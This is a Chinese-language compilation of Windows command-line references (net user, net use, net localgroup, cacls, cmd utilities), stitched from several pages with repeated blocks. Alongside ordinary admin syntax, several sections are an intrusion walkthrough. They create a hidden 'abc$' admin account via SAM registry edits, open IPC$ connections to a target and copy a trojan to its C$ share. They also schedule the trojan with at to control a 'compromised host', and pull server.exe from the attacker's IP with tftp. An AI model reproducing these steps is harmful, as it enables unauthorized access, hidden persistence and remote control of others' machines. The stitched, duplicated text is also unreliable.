下载文档原格式
用net user创建用户及提升权限(net user 1234 12345 /add创建一个用户名为1234密码为12345的用户net localgroup administrators 1234 /add把用户1234添加到管理员组net localgroup administrators 1234 /delete把“用户”从到管理员组中使删除。
net localgroup users 用户名 /add把“用户”添加到普通用户组使其变为普通受限用户。
net user 1234 /del这个命名表示把它删除net的用法还有很多,net user 可以查看到现有的用户net user 后面加用户名就可以查看该用户的状态比如net user user1就可以查看user1的属性net user user1 /active:yes/noyes是指激活当前用户,no是指禁用当前用户首先输入net user abc$ /addabc是建立的用户名,$符号是表示在dos下面隐藏那么就完了吗?输入net user,察看的目录下并没有显示出abc$但是你在运行里面输入lusrmgr.msc在用户里面看看,abc$还是存在的,这样的话就达不到超级隐藏的目的了。
下面我们接着看,如何把它在计算机管理里面隐藏起来。
于是我们要用到注册表了,在运行里面输入regedt32进入编辑界面在下面键值下HKEY_LOCAL_MACHINE\SAM\sam做。
首先我们要编辑它的权限,点sam然后点窗口上的编辑,在点权限命令,赋予administrator对sam的完全控制权限。
如果没有的话,点添加,输入administrator,点确定。
好,然后刷新一下。
重新打开,这样sam下面就可以展开了。
到以下键值HKEY_LOCAL_MACHINE\SAM\sam\domains\account\users,展开users,在展开users键值下的names.好了,现在你看到的就是你计算机上面所有的用户。
net user <username> [password or *] [/add] [options] [/domain]net user <username] /delete /domainusername 帐户名password 分配或改变密码* 密码提示/domain 在一个域中执行/add 创建一个帐户/delete 删除一个帐户/active:[yes or no] 激活或停止一个帐户/comment:"<text>" 加入描述性说明/counterycode.nnn nnn 是系统编码. 0为系统缺省值/expires:<date or never> 帐户到期时间/fullname:"<name>" 帐户全名/homedir:<path> 用户主目录路径/passwordchg:[yes or no] 设置用户能否更改密码/passwordreq:[yes or no] 设置用户是否需要密码/profilepath:<path> 设置环境文件路径/scriptpath:<path> 登录脚本路径/times:<times or all> 用户可以登录的小时数/usercomment:"<text>" 帐户说明信息/workstations:<machine names> 允许登录的用户名. * 表示所有用户.注意,net user *** /参数之中“/”与***之间有空格。
NET USER[username [password | *] [options]] [/DOMAIN]username {password | *} /ADD [options] [/DOMAIN]username [/DELETE] [/DOMAIN]NET USER 用于创建和修改计算机上的用户帐户。
Windows cmd 中的用户管理和权限控制命令详解在Windows操作系统中,命令提示符(cmd)是一个强大的工具,可以通过它来进行各种系统管理和配置操作。
本文将详细介绍Windows cmd中的用户管理和权限控制命令,帮助读者更好地理解和应用这些命令。
一、用户管理命令1. net user 命令net user命令是Windows cmd中用于管理用户的主要命令之一。
通过该命令,可以创建、修改、删除用户账户,以及设置用户密码等操作。
例如,要创建一个名为"John"的用户账户,可以使用以下命令:net user John /add要删除该用户账户,可以使用以下命令:net user John /delete2. net localgroup 命令除了创建和删除用户账户,我们还可以使用net localgroup命令来管理本地用户组。
通过该命令,可以创建、修改、删除本地用户组,以及向用户组中添加或删除成员。
例如,要创建一个名为"Developers"的本地用户组,可以使用以下命令:net localgroup Developers /add要将用户"John"添加到该用户组,可以使用以下命令:net localgroup Developers John /add3. net accounts 命令net accounts命令用于管理用户账户的一些基本设置,如密码策略、账户锁定等。
通过该命令,可以修改这些设置以提高系统的安全性。
例如,要设置密码最小长度为8个字符,可以使用以下命令:net accounts /minpwlen:8二、权限控制命令1. cacls 命令cacls命令用于设置和修改文件或目录的访问控制列表(ACL)。
通过该命令,可以控制哪些用户或用户组有权访问、修改或删除文件。
例如,要将文件"test.txt"的完全控制权限授予用户"John",可以使用以下命令:cacls test.txt /e /g John:F2. icacls 命令icacls命令是cacls命令的升级版,提供了更多的权限控制选项。
NET USE 命令用法NET USE 命令用法net use 列出本机网络连接net use \\IP\ipc$ "密码" /user:"帐号" 建立与指定IP的 IPC$(空连接)net use z: \\IP\c$ "密码" /user:"帐号" 将对方的c 盘映射 为自己的z盘net use \\IP\ipc$ /del 删除与指定IP的IPC$连接net use z: /del 删除本机映射的z盘net use * /del 删除本机所有映射和IPC$连接如提示:提供的凭据与已存在的凭据冲突, net use * /del 即可Net use将计算机连接到某个共享资源或与其断开连接,或者显示有关计算机连接的信息。
该命令还控制永 久性网络连接。
在没有参数的情况下使用,net use 可以检索网络连接列表。
语法net use [{DeviceName | *}] [{\\ComputerName[\Share Name[\Volume]]] |[http://ComputerName/ShareName[/Folder]}] [{Password | *}]] [/userscreen.width-300)this.width=sc reen.width-300'>DomainName\]UserName] [/userscreen.width-3 00)this.width=screen.width-300'>DottedDomainName\]UserName][/userscreen.width-300)this.width=screen.width-300'>UserN ame@DottedDomainName] [/savecred] [/smartcard] [{/delete | /persistent:{yes | no}}]net use [DeviceName [/home[{Password | *}] [/dele te:{yes | no}]]net use [/persistent:{yes | no}]参数DeviceName指派名称以连接到资源,或指定要断开连接的设备。
netuse命令集合详解net use \\ip\ipc$ " " /user:" " 建立IPC空链接net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为 H:net use h: \\ip\c$ 登陆后映射对方C:到本地为H:net use \\ip\ipc$ /del 删除IPC链接net use h: /del 删除映射对方到本地的为H:的映射net user 用户名密码/add 建立用户net user guest /active:yes 激活guest用户net user 查看有哪些用户net user 帐户名查看帐户的属性net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数net start 查看开启了哪些服务net start 服务名开启服务;(如:net start telnet,net start schedule)net stop 服务名停止某服务net time \\目标ip 查看对方时间net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息net view 查看本地局域网内开启了哪些共享net view \\ip 查看对方局域网内开启了哪些共享net config 显示系统网络设置net logoff 断开连接的共享net pause 服务名暂停某服务net send ip "文本信息" 向对方发信息net ver 局域网内正在使用的网络连接类型和信息net share 查看本地开启的共享net share ipc$ 开启ipc$共享net share ipc$ /del 删除ipc$共享net share c$ /del 删除C:共享net user guest 12345 用guest用户登陆后用将密码改为12345 net password 密码更改系统登陆密码netstat -a 查看开启了哪些端口,常用netstat -annetstat -n 查看端口的网络连接情况,常用netstat -annetstat -v 查看正在进行的工作netstat -p 协议名例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况)netstat -s 查看正在使用的所有协议使用情况nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写tracert -参数ip(或计算机名) 跟踪路由(数据包),参数:“-w 数字”用于设置超时间隔。
net user命令集合详解net use \\ip\ipc$ " " /user:" " 建立IPC空链接net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H: net use h: \\ip\c$ 登陆后映射对方C:到本地为H:net use \\ip\ipc$ /del 删除IPC链接net use h: /del 删除映射对方到本地的为H:的映射net user 用户名密码/add 建立用户net user guest /active:yes 激活guest用户net user 查看有哪些用户net user 帐户名查看帐户的属性net localgroup administrators 用户名/add 把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数net start 查看开启了哪些服务net start 服务名开启服务;(如:net start telnet,net start schedule)net stop 服务名停止某服务net time \\目标ip 查看对方时间net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息net view 查看本地局域网内开启了哪些共享net view \\ip 查看对方局域网内开启了哪些共享net config 显示系统网络设置net logoff 断开连接的共享net pause 服务名暂停某服务net send ip "文本信息" 向对方发信息net ver 局域网内正在使用的网络连接类型和信息net share 查看本地开启的共享net share ipc$ 开启ipc$共享net share ipc$ /del 删除ipc$共享net share c$ /del 删除C:共享net user guest 12345 用guest用户登陆后用将密码改为12345net password 密码更改系统登陆密码netstat -a 查看开启了哪些端口,常用netstat -annetstat -n 查看端口的网络连接情况,常用netstat -annetstat -v 查看正在进行的工作netstat -p 协议名例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况)netstat -s 查看正在使用的所有协议使用情况nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写。
net use命令用法一、概述net use命令是Windows操作系统中的一个命令行工具,用于连接或断开计算机与网络共享资源之间的连接。
该命令可以用于映射网络驱动器和打印机,以及连接到远程计算机。
二、语法net use [device_name | *][\\computer_name\share_name[\volume] [password | *]][/user:[domain_name\]user_name] [/persistent:{yes | no}][/savecred] [/delete] [/help]其中,- device_name:指定要分配的驱动器号或设备名称。
- *:表示由系统自动分配可用驱动器号。
- computer_name:指定要连接的计算机名称。
- share_name:指定要连接的共享资源名称。
- volume:指定要映射到本地驱动器上的卷标。
- password:指定与共享资源关联的密码。
- /user:指定用于访问共享资源的用户名和密码。
- domain_name:指定用户名所属的域名。
如果省略,则默认为当前域名。
- user_name:指定用户名。
- /persistent:{yes | no}:设置网络驱动器是否在重新启动后保留持久性。
如果设置为yes,则在重新启动后仍然存在;如果设置为no,则在重新启动后消失。
- /savecred:保存用户凭据以便下次使用时自动登录。
必须使用管理员权限运行此命令才能使用此选项。
- /delete:断开与指定共享资源的连接。
- /help:显示帮助信息。
三、用法示例1. 连接到共享文件夹命令格式:net use [device_name] \\computer_name\share_name例如,要将共享文件夹“\\192.168.1.100\share”映射到本地驱动器“Z:”,可以使用以下命令:net use Z: \\192.168.1.100\share如果需要进行身份验证,则可以在命令后面添加用户名和密码:net use Z: \\192.168.1.100\share /user:username password2. 断开与共享文件夹的连接命令格式:net use [device_name] /delete例如,要断开与驱动器“Z:”的连接,可以使用以下命令:net use Z: /delete3. 连接到远程计算机命令格式:net use [device_name] \\computer_name\IPC$例如,要连接到名称为“192.168.1.100”的远程计算机,可以使用以下命令:net use \\192.168.1.100\IPC$ /user:username password4. 显示当前连接状态命令格式:net use该命令将显示当前所有网络驱动器和打印机的连接状态。
用net user创建用户及提升权限(net user 1234 12345 /add创建一个用户名为1234密码为12345的用户net localgroup administrators 1234 /add把用户1234添加到管理员组net localgroup administrators 1234 /delete把“用户”从到管理员组中使删除。
net localgroup users 用户名 /add把“用户”添加到普通用户组使其变为普通受限用户。
net user 1234 /del这个命名表示把它删除net的用法还有很多,net user 可以查看到现有的用户net user 后面加用户名就可以查看该用户的状态比如net user user1就可以查看user1的属性net user user1 /active:yes/noyes是指激活当前用户,no是指禁用当前用户首先输入net user abc$ /addabc是建立的用户名,$符号是表示在dos下面隐藏那么就完了吗?输入net user,察看的目录下并没有显示出abc$但是你在运行里面输入lusrmgr.msc在用户里面看看,abc$还是存在的,这样的话就达不到超级隐藏的目的了。
下面我们接着看,如何把它在计算机管理里面隐藏起来。
于是我们要用到注册表了,在运行里面输入regedt32进入编辑界面在下面键值下HKEY_LOCAL_MACHINE\SAM\sam做。
首先我们要编辑它的权限,点sam然后点窗口上的编辑,在点权限命令,赋予administrator对sam的完全控制权限。
如果没有的话,点添加,输入administrator,点确定。
好,然后刷新一下。
重新打开,这样sam下面就可以展开了。
到以下键值HKEY_LOCAL_MACHINE\SAM\sam\domains\account\users,展开users,在展开users键值下的names.好了,现在你看到的就是你计算机上面所有的用户。
Net命令使用介绍(部分)1、net view // 查看当前域中的计算机2、net user //显示本机所有用户列表3、net use \\192.168.1.222\ipc$123456 /user :administrator //与192.168.1.222的电脑建立信任连接,该电脑的用户名是administrator ,密码是1234564、net use \\192.168.1.222 /del //删除IPC$空连接5、net start telnet //开启telnet服务6、net stop telnet //关闭telnet服务7、net shate ipc$Content$nbsp; //开启ipc$默认共享8、net share ipc$/del //关闭ipc$默认共享9、net share c=c:/ //完全共享c盘10、net share d /del //删除完全共享的d盘11、net use z: \\127.0.0.1/c$//把127.0.0.1的C盘映射成本机的z盘12、net use z: /del //断开映射入侵中的作用:把对方的硬盘映射过来以后我们就能直接复制文件到对方的硬盘下面了成功实现的条件:必须与对方建立ipc$连接(1) 远程复制文件_Copycopy e:/3389.exe \\192.168.1.222/c$//将本地的E盘下的3389.exe这个文件copy到对方系统的C盘根目录下Copy在入侵中的作用:把本地文件复制到对方硬盘Copy复制成功所需的条件:必须与主机建立ipc$连接(2) 查看远程系统的时间net time \\192.168.1.222 //查看远程主机192.168.1.222的本地时间作用:得到对方时间好为自己计划任务种下木马做准备(3) 远程运行程序at \\ip time server.exeat \\192.168.1.222 12:30 c:/server.exe //让主机在中午12:30分运行我们已经复制到他C盘根目录下的木马server.exe在入侵中作用:这样我们就可以用我们的木马服务端来连接我们木马,,更好的使用图形方式来控制肉鸡(4)添加管理员帐号:net user username 1234 /add //添加一个密码为1234名字为username的用户net localgroup administrators juntuan /add //把username这个用户添加到管理员组注意:有些系统的管理员组不是administrators你要根据实际情况来改,不过99.9%的系统的管理员组还是administrators的。
net use \\ip\ipc$ " " /user:" " 建立IPC空链接net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H:net use h: \\ip\c$ 登陆后映射对方C:到本地为H:net use \\ip\ipc$ /del 删除IPC链接net use h: /del 删除映射对方到本地的为H:的映射net user 用户名密码/add 建立用户net user guest /active:yes 激活guest用户net user 查看有哪些用户net user 帐户名查看帐户的属性net localgroup administrators 用户名/add 把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数net start 查看开启了哪些服务net start 服务名开启服务;(如:net start telnet,net start schedule)net stop 服务名停止某服务net time \\目标ip 查看对方时间net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息net view 查看本地局域网内开启了哪些共享net view \\ip 查看对方局域网内开启了哪些共享net config 显示系统网络设置net logoff 断开连接的共享net pause 服务名暂停某服务net send ip "文本信息" 向对方发信息net ver 局域网内正在使用的网络连接类型和信息net share 查看本地开启的共享net share ipc$ 开启ipc$共享net share ipc$ /del 删除ipc$共享net share c$ /del 删除C:共享net user guest 12345 用guest用户登陆后用将密码改为12345net password 密码更改系统登陆密码netstat -a 查看开启了哪些端口,常用netstat -annetstat -n 查看端口的网络连接情况,常用netstat -annetstat -v 查看正在进行的工作netstat -p 协议名例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况)netstat -s 查看正在使用的所有协议使用情况nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写tracert -参数ip(或计算机名) 跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。
ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。
ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址ipconfig可用参数“/all”显示全部配置信息tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)kill -F 进程名加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)del -F 文件名加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除、只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。
例如“DEL/AR *.*”表示删除当前目录下所有只读文件,“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件del /S /Q 目录或用:rmdir /s /Q 目录/S删除目录及目录下的所有子目录和文件。
同时使用参数/Q 可取消删除操作时的系统确认就直接删除。
(二个命令作用相同)move 盘符\路径\要移动的文件名存放移动文件的路径\移动后文件名移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中,"> "和"> >" 是重定向命令at id号开启已注册的某个计划任务at /delete 停止所有计划任务,用参数/yes则不需要确认就直接停止at id号/delete 停止某个已注册的计划任务at 查看所有的计划任务at \\ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机finger username @host 查看最近有哪些用户登陆telnet ip 端口远和登陆服务器,默认端口为23open ip 连接到IP(属telnet登陆后的命令)telnet 在本机上直接键入telnet 将进入本机的telnetcopy 路径\文件名1路径\文件名2 /y 复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件copy c:\srv.exe \\ip\admin$ 复制本地c:\srv.exe到对方的admin下cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件copy \\ip\admin$\svv.exe c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件(所有文件)至本地C:xcopy 要复制的文件或目录树目标地址\目录名复制文件和目录树,用参数/Y将不提示覆盖相同文件tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe登陆后,将“IP”的server.exe下载到目标主机c:\server.exe 参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i 则以ASCII模式(传送文本文件模式)进行传送tftp -i 对方IP put c:\server.exe 登陆后,上传本地c:\server.exe至主机ftp ip 端口用于上传文件至服务器或进行文件操作,默认端口为21。
bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时)route print 显示出IP路由,将主要显示网络地址Network addres,子网掩码Netmask,网关地址Gateway addres,接口地址Interfacearp 查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。
arp -a将显示出全部信息start 程序名或命令/max 或/min 新开一个新窗口并最大化(最小化)运行某程序或命令mem 查看cpu使用情况attrib 文件名(目录名) 查看某文件(目录)的属性attrib 文件名-A -R -S -H 或+A +R +S +H 去掉(添加)某文件的存档,只读,系统,隐藏属性;用+则是添加为某属性dir 查看文件,参数:/Q显示文件及目录属系统哪个用户,/T:C显示文件创建时间,/T:A显示文件上次被访问时间,/T:W 上次被修改时间date /t 、time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间,而不必输入新日期和时间set 指定环境变量名称=要指派给变量的字符设置环境变量set 显示当前所有的环境变量set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量pause 暂停批处理程序,并显示出:请按任意键继续....if 在批处理程序中执行条件处理(更多说明见if命令及变量)goto 标签将cmd.exe导向到批处理程序中带标签的行(标签必须单独一行,且以冒号打头,例如:“:start”标签)call 路径\批处理文件名从批处理程序中调用另一个批处理程序(更多说明见call /?)for 对一组文件中的每一个文件执行某个特定命令(更多说明见for命令及变量)echo on或off 打开或关闭echo,仅用echo不加参数则显示当前echo设置echo 信息在屏幕上显示出信息echo 信息>> pass.txt 将"信息"保存到pass.txt文件中findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hellofind 文件名查找某文件title 标题名字更改CMD窗口标题名字color 颜色值设置cmd控制台前景和背景颜色;0=黑、1=蓝、2=绿、3=浅绿、4=红、5=紫、6=黄、7=白、8=灰、9=淡蓝、A=淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白prompt 名称更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为:EntSky\ )print 文件名打印文本文件ver 在DOS窗口下显示版本信息winver 弹出一个窗口显示版本信息(内存大小、系统版本、补丁版本、计算机名)format 盘符/FS:类型格式化磁盘,类型:FAT、FAT32、NTFS ,例:Format D:/FS:NTFSmd目录名创建目录replace 源文件要替换文件的目录替换文件ren 原文件名新文件名重命名文件名tree 以树形结构显示出目录,用参数-f 将列出第个文件夹中文件名称type 文件名显示文本文件的内容more 文件名逐屏显示输出文件doskey 要锁定的命令=字符doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行,重新调用win2k命令,并创建宏)。
如:锁定dir命令:doskey dir=entsky (不能用doskey dir=dir);解锁:doskey dir=taskmgr 调出任务管理器chkdsk /F D: 检查磁盘D并显示状态报告;加参数/f并修复磁盘上的错误tlntadmn telnt服务admn,键入tlntadmn选择3,再选择8,就可以更改telnet服务默认端口23为其它任何端口exit 退出cmd.exe程序或目前,用参数/B则是退出当前批处理脚本而不是cmd.exepath 路径\可执行文件的文件名为可执行文件设置一个路径。
